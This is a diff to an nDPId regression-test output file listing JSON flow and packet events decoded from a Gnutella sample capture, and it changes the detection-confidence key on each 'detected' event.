00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":71205,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":71205,"pkt":"UlQAEjUCCAAn5uVZCABFAAA08yJAAIAG8AwKAAIPVtC0tcRJszsghBY3AAAAAIAC+vCuSgAAAgQFtAEDAwgBAQQC"} 00519{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":372,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71216,"flow_last_seen":71216,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":71216,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":71216,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":71216,"pkt":"CAAn5uVZUlQAEjUCCABFwAA4AsYAAP8BoC4KAAICCgACDwMBntkAAAAARQAANGWZQAB\/BrMICgACD0xEis\/EN7AX1ucS7g=="} -00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71216,"flow_last_seen":71216,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":71216,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.521641} +00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71216,"flow_last_seen":71216,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":71216,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.521641} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":71312,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":71312,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAscAAEAGYHFW0LS1CgACD7M7xEkAehIBIIQWOGAS\/\/+\/xQAAAgQFtA=="} 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":3,"flow_last_seen":71312,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":71312,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo8yNAAIAG8BcKAAIPVtC0tcRJszsghBY4AHoSAlAQ+vDckQAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":375,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":71205,"flow_last_seen":71313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":71313,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.208.180.181","src_port":50249,"dst_port":45883,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":375,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":71205,"flow_last_seen":71313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":71313,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.208.180.181","src_port":50249,"dst_port":45883,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71535,"flow_last_seen":71535,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":71535,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.160.214.137","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":71535,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":71535,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gnYAAIARfQoKAAIPWKDWiXAJGMoAINufR05EED6TAQFUC1FLUlAGUk5BXS\/iNQlw"} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71535,"flow_last_seen":71535,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":71535,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.78.134.188","src_port":28681,"dst_port":49046,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -376,7 +376,7 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":71541,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":71541,"pkt":"UlQAEjUCCAAn5uVZCABFAAA02U0AAIAREUUKAAIPBbQ+ZHAJtTEAICo0R05EED6pAQFUC1FLUlAGUk5BXS\/iNQlw"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":71605,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":71605,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAswAAEAGY0Nt1prYCgACDxjKxEgAewwBHNfF\/mAS\/\/+29AAAAgQFtA=="} 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":71605,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":71605,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo5AxAAIAGAgYKAAIPbdaa2MRIGMoc18X+AHsMAlAQ+vDTwAAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":71205,"flow_last_seen":71608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":71608,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.214.154.216","src_port":50248,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":71205,"flow_last_seen":71608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":71608,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.214.154.216","src_port":50248,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":72031,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0B1xAAIAGzIMKAAIPVoHEVMQWJrsID0+\/AAAAAIAC+vAKmwAAAgQFtAEDAwgBAQQC"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":72031,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xtxAAIAGndcKAAIPsIDZgMQYsIr8Y98AAAAAAIAC+vCOBwAAAgQFtAEDAwgBAQQC"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":72031,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Iq5AAIAGH9QKAAIPTnpducQZGMpcVbolAAAAAIAC+vDIfgAAAgQFtAEDAwgBAQQC"} @@ -395,13 +395,13 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":72267,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72267,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gnJAAIAGzTgKAAIPGE6GvMROv5bJBoRLAAAAAIAC+vD3zgAAAgQFtAEDAwgBAQQC"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":2,"flow_last_seen":72462,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":72462,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAs8AAEAGtlsbXpo1CgACDxjKxEoAfQABvj80X2AS\/\/8GQwAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":3,"flow_last_seen":72462,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":72462,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoalRAAIAGztkKAAIPG16aNcRKGMq+PzRfAH0AAlAQ+vAjDwAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72264,"flow_last_seen":72463,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":72463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":50250,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72264,"flow_last_seen":72463,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":72463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":50250,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":72471,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":72471,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAtEAAEAG0LF7yh9xCgACD004xEwAfvQBVTNjAWAS\/\/8ykwAAAgQFtA=="} 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":72472,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":72472,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoVqZAAIAG\/N8KAAIPe8ofccRMTThVM2MBAH70AlAQ+vBPXwAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72266,"flow_last_seen":72472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":72472,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.202.31.113","src_port":50252,"dst_port":19768,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72266,"flow_last_seen":72472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":72472,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.202.31.113","src_port":50252,"dst_port":19768,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":72595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":72595,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAtUAAEAGmJxn6GtkCgACD6n0xE0Af+4BiO6DFWAS\/\/9P9AAAAgQFtA=="} 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":72596,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":72596,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo0UVAAIAGSi8KAAIPZ+hrZMRNqfSI7oMVAH\/uAlAQ+vBswAAA"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":435,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72266,"flow_last_seen":72596,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":72596,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":50253,"dst_port":43508,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":435,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72266,"flow_last_seen":72596,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":72596,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":50253,"dst_port":43508,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72848,"flow_last_seen":72848,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":72848,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"170.254.19.6","src_port":28681,"dst_port":24180,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":72848,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72848,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0XAwAAIARFJoKAAIPqv4TBnAJXnQAIAcER05EED6qAQFUC1FLUlAGUk5BXS\/iNQlw"} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72849,"flow_last_seen":72849,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":72849,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.92.178.182","src_port":28681,"dst_port":57302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -477,10 +477,10 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":74329,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74329,"pkt":"UlQAEjUCCAAn5uVZCABFAAA07XNAAIAG0w0KAAIPUD3d9sRWd3H5FzmMAAAAAIAC+vDLcAAAAgQFtAEDAwgBAQQC"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":74362,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":74362,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAuYAAEAGPaRQPd32CgACD3dxxFYAg9YB+Rc5jWAS\/\/8Y4gAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":74362,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":74362,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo7XRAAIAG0xgKAAIPUD3d9sRWd3H5FzmNAIPWAlAQ+vA1rgAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74329,"flow_last_seen":74362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":74362,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74329,"flow_last_seen":74362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":74362,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":74510,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":74510,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAuwAAEAGWa63s1pwCgACDyZ8xFMAhNABNL0aJWAS\/\/9vrAAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":3,"flow_last_seen":74510,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":74510,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo4oxAAIAG+hAKAAIPt7NacMRTJnw0vRolAITQAlAQ+vCMeAAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74327,"flow_last_seen":74511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":74511,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74327,"flow_last_seen":74511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":74511,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZdtAAIAGUVoKAAIPtpuA5MQoDLg79XydAAAAAIAC+vCnHQAAAgQFtAEDAwgBAQQC"} 